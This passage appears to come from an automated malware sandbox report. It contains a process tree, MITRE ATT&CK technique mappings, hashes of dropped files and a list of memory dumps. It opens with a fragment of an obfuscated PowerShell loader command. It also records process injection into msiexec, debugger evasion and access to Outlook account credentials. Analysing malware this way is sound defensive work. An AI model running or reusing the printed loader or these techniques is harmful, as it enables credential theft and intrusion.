(Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zxujhpwodyodsfjivatejtfxgdpjqruf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2628
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bazbz"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:2100
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\munmaaak"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
35deded92af23311322cd62e003279a9

SHA1
dd1e5ac29e40ddb359eb5ea4d33abe5bb462aa0e

SHA256
03e74cdb1e59bf18b8db95e8a2c9bb2a7e5616e84db47fbba52a44e61ac2ef40

SHA512
ef4eafe9edb374854e6da12fa258e7d5e03de8e54e9706db13f6f920a6f17481b9aa9b7311affd1fcef743b6ee577433825e10cb8e0b6775e84d509ab15f66f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB203.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB234.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\zxujhpwodyodsfjivatejtfxgdpjqruf

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F1R8Y8M3XKMHDJJ24ST.temp

Filesize
7KB

MD5
beb260ec0a76e11abb0ce457de858e86

SHA1
74b341104af0dfd4f80824b4c026e2fc3c3681ab

SHA256
3c711c6b221553d69bcbddd43cfc9cacbca4311354aa13aa6dd79a63f3958ba2

SHA512
88cc2c4bc762881e81e23967a9600074b2a06ede3e5f2c4551a26b67de424ff55937b5f43205a189d3b00a3e509d3a6e00272181b82bacc9ee33a08d81f3abcd

Download Submit
C:\Users\Admin\AppData\Roaming\Taxlessly199.Cho

Filesize
441KB

MD5
d6dd607d0385fa57fd266d0b20745898

SHA1
e490c5b4b3b9b696f92b642933c7ad401f147e66

SHA256
181bc534cb64758ddeb1fbf298d1b881965a54c85f4f8ecb06d6c0f8f55c7eca

SHA512
1b09e5083cac393125d50448f189230f08e9df4316befc45389883ee1e4e0ee8fed5f8a71361d6d7822e3a37166e1d53bcf1ef5e7e97e8b6a7967363e4b9b1d2

Download Submit
memory/1588-56-0x0000000006630000-0x000000000714A000-memory.dmp

Filesize
11.1MB

Download
memory/2100-94-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2100-85-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2100-89-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2100-96-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2220-90-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2220-88-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2220-92-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2220-95-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2628-83-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2628-86-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2628-79-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2628-80-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2628-81-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2656-52-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-42-0x000000001B490000-0x000000001B772000-memory.dmp

Filesize
2.9MB

Download
memory/2656-41-0x000007FEF618E000-0x000007FEF618F000-memory.dmp

Filesize
4KB

Download
memory/2656-51-0x000007FEF618E000-0x000007FEF618F000-memory.dmp

Filesize
4KB

Download
memory/2656-48-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-47-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-46-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-45-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-43-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/2656-44-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-105-0x0000000000510000-0x0000000000529000-memory.dmp

Filesize
100KB

Download
memory/2796-109-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-102-0x0000000000510000-0x0000000000529000-memory.dmp

Filesize
100KB

Download
memory/2796-77-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-106-0x0000000000510000-0x0000000000529000-memory.dmp

Filesize
100KB

Download
memory/2796-107-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-108-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-73-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-110-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-111-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-112-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-113-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-114-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-115-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download
memory/2796-117-0x00000000009C0000-0x0000000001A22000-memory.dmp

Filesize
16.4MB

Download